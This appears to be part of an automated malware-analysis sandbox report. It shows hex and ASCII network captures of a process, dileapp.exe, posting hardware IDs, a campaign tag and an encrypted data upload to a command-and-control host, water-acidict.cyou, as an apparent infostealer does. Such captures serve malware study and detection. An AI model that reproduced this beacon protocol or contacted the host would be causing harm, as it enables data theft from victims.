                                                                                                                                      2024-11-29 22:10:12 UTC356INData Raw: 34 34 38 38 0d 0a 63 4d 58 53 32 34 6e 64 77 43 46 41 50 6d 6a 67 44 47 52 49 44 49 49 66 41 64 76 53 2f 4c 51 53 69 34 46 79 44 46 70 6c 68 45 38 4c 35 36 54 35 73 2b 6e 73 41 7a 4e 62 53 74 70 34 46 6a 31 70 72 6a 31 67 76 2f 44 47 30 6e 50 6e 38 68 63 67 65 42 50 70 62 55 71 6a 73 37 66 36 75 4f 77 44 4a 55 5a 4b 32 6c 63 66 61 6d 6e 73 50 54 76 35 74 35 62 57 63 2b 66 6a 45 32 63 31 46 65 67 73 47 4b 6d 31 73 2b 79 2b 70 45 41 73 55 77 32 46 61 51 55 69 59 75 74 79 61 62 62 77 30 4a 5a 33 38 61 4e 49 4c 68 63 41 38 43 34 39 70 4b 47 77 71 36 44 73 57 6d 4a 62 42 73 49 32 52 69 6c 70 34 48 4e 6e 76 37 6d 55 33 48 72 76 34 68 5a 6d 4b 67 7a 69 4a 78 69 6e 74 72 4c 6d 74 37 42 4e 4a 6c 51 47 67 32 4d 46 61 69 43 67 65 6e 76 35 36 4e 36 46 51 75 72 79 41
                                                                                                                                      Data Ascii: 4488cMXS24ndwCFAPmjgDGRIDIIfAdvS/LQSi4FyDFplhE8L56T5s+nsAzNbStp4Fj1prj1gv/DG0nPn8hcgeBPpbUqjs7f6uOwDJUZK2lcfamnsPTv5t5bWc+fjE2c1FegsGKm1s+y+pEAsUw2FaQUiYutyabbw0JZ38aNILhcA8C49pKGwq6DsWmJbBsI2Rilp4HNnv7mU3Hrv4hZmKgziJxintrLmt7BNJlQGg2MFaiCgenv56N6FQuryA
                                                                                                                                      2024-11-29 22:10:12 UTC1369INData Raw: 4a 52 4b 6c 63 42 68 33 77 4e 49 32 50 74 66 57 36 7a 76 35 33 57 64 2b 50 70 48 32 51 38 43 75 73 72 45 71 66 77 39 36 75 34 75 67 4e 36 48 43 6d 48 66 67 45 6d 65 4b 4a 48 49 36 62 2b 68 35 5a 33 35 61 4e 49 4c 6a 41 43 35 53 34 5a 71 4c 4f 78 34 4b 32 69 55 53 52 52 44 35 42 6f 41 79 52 6b 34 32 39 70 74 37 61 64 33 33 76 67 35 68 64 71 65 45 6d 6d 4b 67 72 6e 36 50 6e 4b 73 71 6c 50 4b 45 73 4b 77 6e 46 49 4d 79 37 6e 63 53 50 68 38 4a 72 58 64 4f 6a 6e 48 6d 41 38 43 2b 41 6a 48 36 69 32 73 2b 75 34 71 45 73 71 58 51 65 4a 59 51 59 76 59 2b 52 37 62 37 69 31 33 70 67 77 37 76 74 51 4e 6e 67 70 34 53 34 41 35 59 57 36 35 62 47 6c 56 57 4a 44 52 4a 73 75 41 53 59 75 75 44 31 74 76 4c 2b 4d 31 32 4c 73 37 51 4a 69 50 51 48 72 4c 68 79 6e 74 62 37 6d 73
                                                                                                                                      Data Ascii: JRKlcBh3wNI2PtfW6zv53Wd+PpH2Q8CusrEqfw96u4ugN6HCmHfgEmeKJHI6b+h5Z35aNILjAC5S4ZqLOx4K2iUSRRD5BoAyRk429pt7ad33vg5hdqeEmmKgrn6PnKsqlPKEsKwnFIMy7ncSPh8JrXdOjnHmA8C+AjH6i2s+u4qEsqXQeJYQYvY+R7b7i13pgw7vtQNngp4S4A5YW65bGlVWJDRJsuASYuuD1tvL+M12Ls7QJiPQHrLhyntb7ms
                                                                                                                                      2024-11-29 22:10:12 UTC1369INData Raw: 44 52 4a 73 75 41 53 59 75 75 44 31 76 73 4c 43 56 33 48 54 70 35 42 31 72 4f 77 44 6c 49 42 57 74 76 72 37 76 73 36 74 4f 4a 46 77 4e 68 6d 73 55 4c 32 66 73 63 53 50 33 38 4a 6e 4f 4d 4c 47 6a 50 32 6b 75 42 4d 6b 75 41 36 37 77 70 71 57 6d 34 6b 51 75 48 46 4c 43 61 51 4d 69 5a 65 5a 31 59 36 75 31 6b 4e 31 78 34 2b 55 52 59 7a 51 42 35 69 77 53 6f 62 79 35 37 4c 69 77 55 53 64 61 47 49 67 75 53 47 70 70 2b 44 30 37 2b 59 61 4f 77 57 48 2f 6f 53 56 74 4e 67 6e 68 4f 31 4b 34 2f 71 43 72 75 4b 34 44 65 68 77 42 67 6d 49 42 49 6d 6a 6b 64 57 79 32 75 59 7a 58 66 4f 66 78 46 32 34 78 43 65 6b 68 47 36 71 33 74 4f 43 31 72 30 63 6c 58 55 72 4d 4c 67 45 79 4c 72 67 39 56 61 6d 39 6b 76 68 37 35 65 70 51 63 58 59 65 70 69 6f 65 35 2b 6a 35 37 37 4f 71 53 53
                                                                                                                                      Data Ascii: DRJsuASYuuD1vsLCV3HTp5B1rOwDlIBWtvr7vs6tOJFwNhmsUL2fscSP38JnOMLGjP2kuBMkuA67wpqWm4kQuHFLCaQMiZeZ1Y6u1kN1x4+URYzQB5iwSoby57LiwUSdaGIguSGpp+D07+YaOwWH/oSVtNgnhO1K4/qCruK4DehwBgmIBImjkdWy2uYzXfOfxF24xCekhG6q3tOC1r0clXUrMLgEyLrg9Vam9kvh75epQcXYepioe5+j577OqSS
                                                                                                                                      2024-11-29 22:10:12 UTC1369INData Raw: 61 67 45 75 61 4f 38 39 4c 66 6d 33 68 70 59 6f 71 63 77 33 57 33 6f 6d 33 47 30 4e 36 61 6e 35 37 4c 50 69 47 32 4a 51 43 59 35 6d 43 53 78 6e 37 48 64 71 73 72 79 56 30 6e 7a 67 35 68 5a 76 50 51 4c 6e 4b 52 36 74 74 72 72 6f 73 4b 31 4d 4b 68 78 45 77 6d 6b 65 61 6a 61 67 57 48 53 79 76 70 69 57 62 36 66 36 55 47 6b 30 52 37 35 74 48 71 36 32 76 2b 36 7a 6f 30 55 71 57 51 4b 47 62 77 41 73 62 65 39 35 5a 72 69 2f 6d 74 70 2b 34 2b 49 52 59 6a 4d 49 37 53 68 53 36 66 43 2b 38 2f 2f 36 41 78 4e 66 48 4a 56 2b 43 6d 70 78 72 6d 51 6a 76 72 7a 65 6a 6a 44 6f 38 52 70 6b 4e 67 4c 70 4b 42 47 6f 74 37 54 74 73 36 68 4b 4b 6c 6f 46 69 33 77 46 4a 6d 44 6e 63 32 2b 33 76 5a 54 56 66 61 6d 74 55 47 6b 67 52 37 35 74 50 71 43 39 6c 2b 43 7a 70 51 4d 39 45 68 50
                                                                                                                                      Data Ascii: agEuaO89Lfm3hpYoqcw3W3om3G0N6an57LPiG2JQCY5mCSxn7HdqsryV0nzg5hZvPQLnKR6ttrrosK1MKhxEwmkeajagWHSyvpiWb6f6UGk0R75tHq62v+6zo0UqWQKGbwAsbe95Zri/mtp+4+IRYjMI7ShS6fC+8//6AxNfHJV+CmpxrmQjvrzejjDo8RpkNgLpKBGot7Tts6hKKloFi3wFJmDnc2+3vZTVfamtUGkgR75tPqC9l+CzpQM9EhP
                                                                                                                                      2024-11-29 22:10:12 UTC1369INData Raw: 58 61 67 4a 53 4f 50 74 34 37 47 63 36 76 53 42 6d 30 75 44 4f 73 68 55 72 6a 2b 6f 4b 75 34 72 67 4e 36 48 41 79 4e 5a 77 55 6c 62 2b 6c 78 62 72 79 35 6d 39 64 32 37 65 6b 61 62 6a 34 42 35 79 67 59 70 4c 47 7a 34 72 69 71 52 43 46 4f 53 73 77 75 41 54 49 75 75 44 31 4b 76 71 4b 51 78 6a 44 32 72 51 6b 75 50 77 75 6d 64 56 4b 6a 75 72 62 76 75 4b 35 46 4a 31 6f 48 67 32 45 48 4b 6d 48 6b 64 6d 71 2f 73 5a 50 54 66 65 33 78 47 6d 55 33 43 2b 38 68 48 2b 66 2b 2b 65 79 6e 34 68 74 69 62 51 65 4d 59 41 45 38 4c 76 38 7a 65 76 6d 33 6b 70 59 6f 71 65 49 63 59 54 73 49 35 53 34 54 72 61 4b 72 35 37 61 71 52 69 35 58 42 49 52 38 41 43 56 6e 34 33 35 71 76 72 69 53 33 48 50 75 6f 31 34 75 50 78 2b 6d 64 56 4b 45 70 36 6e 6d 2f 37 30 4e 4f 78 77 4e 6a 69 35 65
                                                                                                                                      Data Ascii: XagJSOPt47Gc6vSBm0uDOshUrj+oKu4rgN6HAyNZwUlb+lxbry5m9d27ekabj4B5ygYpLGz4riqRCFOSswuATIuuD1KvqKQxjD2rQkuPwumdVKjurbvuK5FJ1oHg2EHKmHkdmq/sZPTfe3xGmU3C+8hH+f++eyn4htibQeMYAE8Lv8zevm3kpYoqeIcYTsI5S4TraKr57aqRi5XBIR8ACVn435qvriS3HPuo14uPx+mdVKEp6nm/70NOxwNji5e
                                                                                                                                      2024-11-29 22:10:12 UTC1369INData Raw: 68 6c 74 72 2b 58 33 33 54 68 34 42 42 71 50 41 44 6a 4c 68 36 73 74 37 72 6b 75 36 74 4e 4b 31 4e 4b 7a 43 34 42 4d 69 36 34 50 55 4b 69 73 35 4c 62 4d 50 61 74 43 53 34 2f 43 36 5a 31 55 71 75 2b 76 4f 75 31 70 45 63 6e 57 67 43 48 62 67 30 70 59 65 52 37 5a 37 61 77 6c 64 39 78 37 2b 59 61 5a 54 34 4b 35 53 73 55 35 2f 37 35 37 4b 66 69 47 32 4a 38 45 59 39 69 41 57 70 78 72 6d 51 6a 76 72 7a 65 6a 6a 44 69 37 78 52 70 4f 41 72 6c 4a 52 65 6a 75 72 7a 72 74 37 42 4c 49 6c 73 59 6b 47 34 50 4c 32 4c 6a 66 57 65 2f 75 5a 6a 56 64 4b 6d 74 55 47 6b 67 52 37 35 74 50 36 75 33 6b 4f 79 6b 34 6c 78 73 52 55 71 46 59 6b 5a 79 4c 75 46 32 61 62 61 39 6e 64 42 7a 34 75 59 61 62 7a 38 50 36 7a 38 52 71 4c 2b 39 36 37 43 6b 52 53 4e 54 44 49 56 6e 42 79 4a 70 6f
                                                                                                                                      Data Ascii: hltr+X33Th4BBqPADjLh6st7rku6tNK1NKzC4BMi64PUKis5LbMPatCS4/C6Z1Uqu+vOu1pEcnWgCHbg0pYeR7Z7awld9x7+YaZT4K5SsU5/757KfiG2J8EY9iAWpxrmQjvrzejjDi7xRpOArlJRejurzrt7BLIlsYkG4PL2LjfWe/uZjVdKmtUGkgR75tP6u3kOyk4lxsRUqFYkZyLuF2aba9ndBz4uYabz8P6z8RqL+967CkRSNTDIVnByJpo
                                                                                                                                      2024-11-29 22:10:12 UTC1369INData Raw: 58 69 4e 78 33 2b 65 51 48 59 58 68 4a 70 69 4a 53 2f 34 6e 35 34 72 69 35 55 6a 52 52 47 6f 55 75 4f 57 51 75 2b 44 30 37 2b 59 57 64 32 48 37 75 39 51 45 6a 48 78 48 73 4b 67 4b 67 70 37 61 72 38 65 4a 46 59 67 52 5a 7a 43 34 43 4f 79 36 34 4c 54 48 69 35 63 32 42 49 4c 76 38 58 6e 64 34 45 61 5a 31 51 4f 6e 77 71 36 76 6e 34 67 51 68 54 68 69 45 62 52 41 70 4b 64 35 44 52 4b 4f 39 6d 4d 46 68 31 39 30 58 64 44 55 42 38 54 78 65 73 72 4f 33 35 62 69 30 41 32 77 63 42 63 49 32 50 32 6f 6d 6f 45 49 74 2b 61 6a 65 6a 6a 44 63 34 42 35 67 50 78 48 33 59 44 57 39 76 62 2f 38 72 75 49 4e 59 6c 70 4b 32 6a 35 49 61 6d 72 78 50 54 76 70 34 73 57 44 49 37 36 7a 51 6e 46 32 48 71 59 37 55 76 2f 69 39 36 75 74 34 68 74 69 47 77 6d 51 66 41 41 70 65 4f 4d 36 58 59
                                                                                                                                      Data Ascii: XiNx3+eQHYXhJpiJS/4n54ri5UjRRGoUuOWQu+D07+YWd2H7u9QEjHxHsKgKgp7ar8eJFYgRZzC4COy64LTHi5c2BILv8Xnd4EaZ1QOnwq6vn4gQhThiEbRApKd5DRKO9mMFh190XdDUB8TxesrO35bi0A2wcBcI2P2omoEIt+ajejjDc4B5gPxH3YDW9vb/8ruINYlpK2j5IamrxPTvp4sWDI76zQnF2HqY7Uv/i96ut4htiGwmQfAApeOM6XY
                                                                                                                                      2024-11-29 22:10:12 UTC1369INData Raw: 52 65 72 74 48 6d 6b 75 46 71 73 4b 48 4b 43 78 72 2f 75 6f 72 51 4e 73 48 41 7a 43 4e 6c 52 6b 4c 75 52 73 49 2b 48 67 7a 49 30 6c 75 72 52 41 50 43 64 4a 2f 32 30 45 35 2b 6a 72 70 66 2b 77 41 33 6f 63 54 59 46 38 46 43 78 74 39 6e 34 6b 68 34 36 35 32 48 66 6f 39 51 42 35 4e 30 6a 49 47 7a 4f 5a 6a 71 7a 6f 73 61 78 45 4e 45 31 4b 7a 43 34 4a 61 6a 62 5a 50 53 76 35 6a 39 43 57 61 4b 6d 37 55 46 73 37 43 65 67 71 42 4c 62 39 6e 75 57 34 6f 31 55 79 53 77 58 4e 51 44 41 4c 4c 71 34 39 5a 66 6e 6f 7a 4a 67 77 37 66 4a 51 4e 6d 68 56 76 58 68 42 38 4f 44 72 39 50 47 37 41 7a 51 63 55 74 41 67 52 6a 67 75 75 44 30 6b 75 71 4b 4d 30 48 50 2f 34 46 64 51 42 69 44 6f 4b 68 4f 78 6f 4c 54 6e 6e 71 46 53 4b 47 49 30 6c 32 30 49 4a 47 6e 32 62 43 50 33 38 4a 47
                                                                                                                                      Data Ascii: RertHmkuFqsKHKCxr/uorQNsHAzCNlRkLuRsI+HgzI0lurRAPCdJ/20E5+jrpf+wA3ocTYF8FCxt9n4kh4652Hfo9QB5N0jIGzOZjqzosaxENE1KzC4JajbZPSv5j9CWaKm7UFs7CegqBLb9nuW4o1UySwXNQDALLq49ZfnozJgw7fJQNmhVvXhB8ODr9PG7AzQcUtAgRjguuD0kuqKM0HP/4FdQBiDoKhOxoLTnnqFSKGI0l20IJGn2bCP38JG
                                                                                                                                      2024-11-29 22:10:12 UTC1369INData Raw: 52 4e 34 4f 30 44 59 45 7a 2b 31 74 36 6e 6f 2f 5a 4e 4f 4a 6b 6f 66 67 58 34 42 46 46 44 4e 62 32 53 70 73 39 7a 36 64 2b 54 76 4c 6c 41 50 46 75 45 39 55 49 47 7a 72 2b 6a 2f 37 41 4d 36 48 46 4c 43 51 78 51 74 66 75 4d 2f 54 37 36 39 6b 70 5a 76 70 2f 70 51 65 48 68 66 74 57 4e 53 74 66 44 68 71 2f 69 68 55 54 42 61 43 5a 52 74 51 52 52 51 7a 57 39 6b 71 62 50 63 35 33 33 74 39 51 56 74 4b 41 44 59 45 7a 2b 31 74 36 6e 6f 2f 59 64 35 59 47 30 63 67 57 34 49 4c 53 36 75 50 58 76 35 36 4e 37 37 59 75 37 7a 45 79 77 64 50 61 51 63 42 4b 53 77 74 2b 7a 2f 37 41 4d 75 48 46 4c 43 59 78 51 74 66 75 4d 78 5a 4b 4f 33 33 73 6b 2b 38 4b 4d 47 4c 6d 42 55 71 47 30 41 35 2b 6a 35 72 4c 47 76 51 69 46 53 43 5a 42 38 41 43 6c 34 34 7a 70 64 68 35 2b 56 31 32 44 6b
                                                                                                                                      Data Ascii: RN4O0DYEz+1t6no/ZNOJkofgX4BFFDNb2Sps9z6d+TvLlAPFuE9UIGzr+j/7AM6HFLCQxQtfuM/T769kpZvp/pQeHhftWNStfDhq/ihUTBaCZRtQRRQzW9kqbPc533t9QVtKADYEz+1t6no/Yd5YG0cgW4ILS6uPXv56N77Yu7zEywdPaQcBKSwt+z/7AMuHFLCYxQtfuMxZKO33sk+8KMGLmBUqG0A5+j5rLGvQiFSCZB8ACl44zpdh5+V12Dk


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      6192.168.2.449748172.67.156.2174437984C:\Users\Public\Netstat\dileapp.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-11-29 22:10:13 UTC277OUTPOST /api HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Content-Type: multipart/form-data; boundary=3H5U00QCDNS
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                      Content-Length: 18326
                                                                                                                                      Host: water-acidict.cyou
                                                                                                                                      2024-11-29 22:10:14 UTC15331OUTData Raw: 2d 2d 33 48 35 55 30 30 51 43 44 4e 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 37 45 44 38 44 42 30 36 34 37 33 39 45 33 36 32 37 32 34 45 39 32 36 43 45 34 39 35 44 39 46 0d 0a 2d 2d 33 48 35 55 30 30 51 43 44 4e 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 33 48 35 55 30 30 51 43 44 4e 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 63 32 43 6f 57 30 2d 2d 62 61 6e 64 6c 0d 0a 2d 2d 33 48 35 55 30 30 51 43 44 4e 53 0d 0a 43 6f 6e 74
                                                                                                                                      Data Ascii: --3H5U00QCDNSContent-Disposition: form-data; name="hwid"97ED8DB064739E362724E926CE495D9F--3H5U00QCDNSContent-Disposition: form-data; name="pid"2--3H5U00QCDNSContent-Disposition: form-data; name="lid"c2CoW0--bandl--3H5U00QCDNSCont
                                                                                                                                      2024-11-29 22:10:14 UTC2995OUTData Raw: 4a 3a 3b e2 f5 e9 8b 6e 77 18 74 82 a0 b0 d1 ae 4e 72 af 6c 03 bb ef c0 70 76 68 70 6f b8 ab e0 81 89 d2 ce 70 34 95 3f d4 6e 77 97 74 7a df db 4a ab d9 3a a6 45 b3 54 7c 31 23 5d 55 db 3f 35 ab 59 2f 56 9a f4 45 bb 41 ec 02 5f 8c 47 52 99 43 fc b6 3f 53 d6 79 f9 f3 1a 0e ca ab 93 c8 9f 85 77 5e 16 97 be 18 eb 3d 73 d9 32 ab fe 33 c7 83 ce dc 49 e4 3f b3 1b ea ee a4 d7 a3 91 94 7c 88 af f8 cf ec 5e 94 ce 7e 2c e8 c4 3b 69 fc e7 a5 81 e9 5a 24 9a ba e3 0e 7a b3 b9 ed c8 7b 0f b6 d9 b0 b4 ae ef a3 5d ed c6 1f d3 ef f1 ea c5 f6 b4 94 f4 27 ee 0d 47 53 87 0e f1 bf 6d 76 32 b4 bd 6d a4 37 13 bb cf e9 a5 fc 85 8d f5 95 35 7a c0 7d 85 b5 0d 77 54 d1 d3 26 3b d7 a3 37 ae 53 a3 ed b8 29 da 67 13 8b f5 92 5d 4f 85 8d c2 c5 8d d6 b3 cb d1 7d 8f cf e5 c2 3d f9 0b ab
                                                                                                                                      Data Ascii: J:;nwtNrlpvhpop4?nwtzJ:ET|1#]U?5Y/VEA_GRC?Syw^=s23I?|^~,;iZ$z{]'GSmv2m75z}wT&;7S)g]O}=
                                                                                                                                      2024-11-29 22:10:15 UTC1024INHTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:10:14 GMT
                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: close
                                                                                                                                      Set-Cookie: PHPSESSID=3um6a255thg9j0p9a3fgqlujoe; expires=Tue, 25-Mar-2025 15:56:53 GMT; Max-Age=9999999; path=/
                                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NU1mGixbu%2FHYk7guCy%2FApbqKbkPXX%2FAXKuaBWpQ2LUJyYcNBi8xtZXpPNDOcl8ANpAvg%2FYl0kLaFDxQHN1nc2eJ3tofAI1UD1GMc3dQ4j5TqhfiKIILCiBr2K7kgRk9cHA%2BhKI0%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                      Server: cloudflare
                                                                                                                                      CF-RAY: 8ea5ed369981427f-EWR
                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1761&min_rtt=1759&rtt_var=664&sent=12&recv=21&lost=0&retrans=0&sent_bytes=2844&recv_bytes=19283&delivery_rate=1641371&cwnd=237&unsent_bytes=0&cid=ed81495eefd233c8&ts=1124&x=0"
                                                                                                                                      2024-11-29 22:10:15 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 0d 0a
                                                                                                                                      Data Ascii: fok 8.46.123.228
                                                                                                                                      2024-11-29 22:10:15 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: 0


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      7192.168.2.449750172.67.156.2174437984C:\Users\Public\Netstat\dileapp.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-11-29 22:10:16 UTC283OUTPOST /api HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Content-Type: multipart/form-data; boundary=F2IXTAQELCJS7CO9O2
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                      Content-Length: 8784
                                                                                                                                      Host: water-acidict.cyou
                                                                                                                                      2024-11-29 22:10:16 UTC8784OUTData Raw: 2d 2d 46 32 49 58 54 41 51 45 4c 43 4a 53 37 43 4f 39 4f 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 37 45 44 38 44 42 30 36 34 37 33 39 45 33 36 32 37 32 34 45 39 32 36 43 45 34 39 35 44 39 46 0d 0a 2d 2d 46 32 49 58 54 41 51 45 4c 43 4a 53 37 43 4f 39 4f 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 46 32 49 58 54 41 51 45 4c 43 4a 53 37 43 4f 39 4f 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 63 32 43 6f 57 30 2d 2d 62 61 6e 64 6c
                                                                                                                                      Data Ascii: --F2IXTAQELCJS7CO9O2Content-Disposition: form-data; name="hwid"97ED8DB064739E362724E926CE495D9F--F2IXTAQELCJS7CO9O2Content-Disposition: form-data; name="pid"2--F2IXTAQELCJS7CO9O2Content-Disposition: form-data; name="lid"c2CoW0--bandl
                                                                                                                                      2024-11-29 22:10:17 UTC1015INHTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:10:17 GMT
                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: close
                                                                                                                                      Set-Cookie: PHPSESSID=uejqqsnbjq3oirj4a14bt7sgr3; expires=Tue, 25-Mar-2025 15:56:55 GMT; Max-Age=9999999; path=/
                                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DIQnnOHur%2Fw9nGtRwfJheacCrJsXc15nGWyEyLEX61Sb73c1jtETEdGh37OEHFnODUIcDppDorn7smcVnDumLRkRC4jiaDkCIW9ZC9wH2HSZH0v6hc%2FbICKPDd4eboqkiAqBZVM%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                      Server: cloudflare
                                                                                                                                      CF-RAY: 8ea5ed45e8964237-EWR
                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1743&min_rtt=1741&rtt_var=658&sent=8&recv=14&lost=0&retrans=0&sent_bytes=2844&recv_bytes=9725&delivery_rate=1655328&cwnd=194&unsent_bytes=0&cid=21995e130991ab92&ts=977&x=0"
                                                                                                                                      2024-11-29 22:10:17 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 0d 0a
                                                                                                                                      Data Ascii: fok 8.46.123.228
                                                                                                                                      2024-11-29 22:10:17 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: 0


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      8192.168.2.449751172.67.156.2174437568C:\Users\Public\Netstat\dileapp.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-11-29 22:10:17 UTC265OUTPOST /api HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                      Content-Length: 8
                                                                                                                                      Host: water-acidict.cyou
                                                                                                                                      2024-11-29 22:10:17 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                      Data Ascii: act=life
                                                                                                                                      2024-11-29 22:10:18 UTC1024INHTTP/1.1 200 OK
                                                                                                                                      Date: Fri, 29 Nov 2024 22:10:18 GMT
                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: close
                                                                                                                                      Set-Cookie: PHPSESSID=jfa494mq4kjmri0969nvgr3mno; expires=Tue, 25-Mar-2025 15:56:57 GMT; Max-Age=9999999; path=/
                                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RmP1vXIuOk3wCxRPmJBkPBdet3gJsbQ62%2FKUkhMYYX5uQbcWjzfZ9NSat%2Bbper%2F1fy1cXV0SBOFYjrS9QXSkUhjq%2FxV%2Boip5mQRpObNC5Ktqk56DT%2B0XBiaA0melHrmXaxMyb%2Fc%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                      Server: cloudflare
                                                                                                                                      CF-RAY: 8ea5ed4e881a4401-EWR
                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1826&min_rtt=1825&rtt_var=687&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2844&recv_bytes=909&delivery_rate=1591280&cwnd=231&unsent_bytes=0&cid=65a24f3b0eb02049&ts=1125&x=0"
                                                                                                                                      2024-11-29 22:10:18 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                      Data Ascii: 2ok
                                                                                                                                      2024-11-29 22:10:18 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: 0


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      9192.168.2.44974920.109.210.53443
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-11-29 22:10:18 UTC306OUTGET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=stBxbGhrHxDYMZ9&MD=gESBNraw HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Accept: */*
                                                                                                                                      User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                                                                                      Host: slscr.update.microsoft.com
                                                                                                                                      2024-11-29 22:10:18 UTC560INHTTP/1.1 200 OK
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Pragma: no-cache
                                                                                                                                      Content-Type: application/octet-stream
                                                                                                                                      Expires: -1
                                                                                                                                      Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                                                                      ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880"
                                                                                                                                      MS-CorrelationId: 0d183424-28d3-4bae-9cc8-3333b6e1445f
                                                                                                                                      MS-RequestId: 3ea3a16a-02bd-45d9-8f64-4d8f7bbc946b
                                                                                                                                      MS-CV: mTlSidI7VkStOY2Q.0
                                                                                                                                      X-Microsoft-SLSClientCache: 2880
                                                                                                                                      Content-Disposition: attachment; filename=environment.cab
                                                                                                                                      X-Content-Type-Options: nosniff
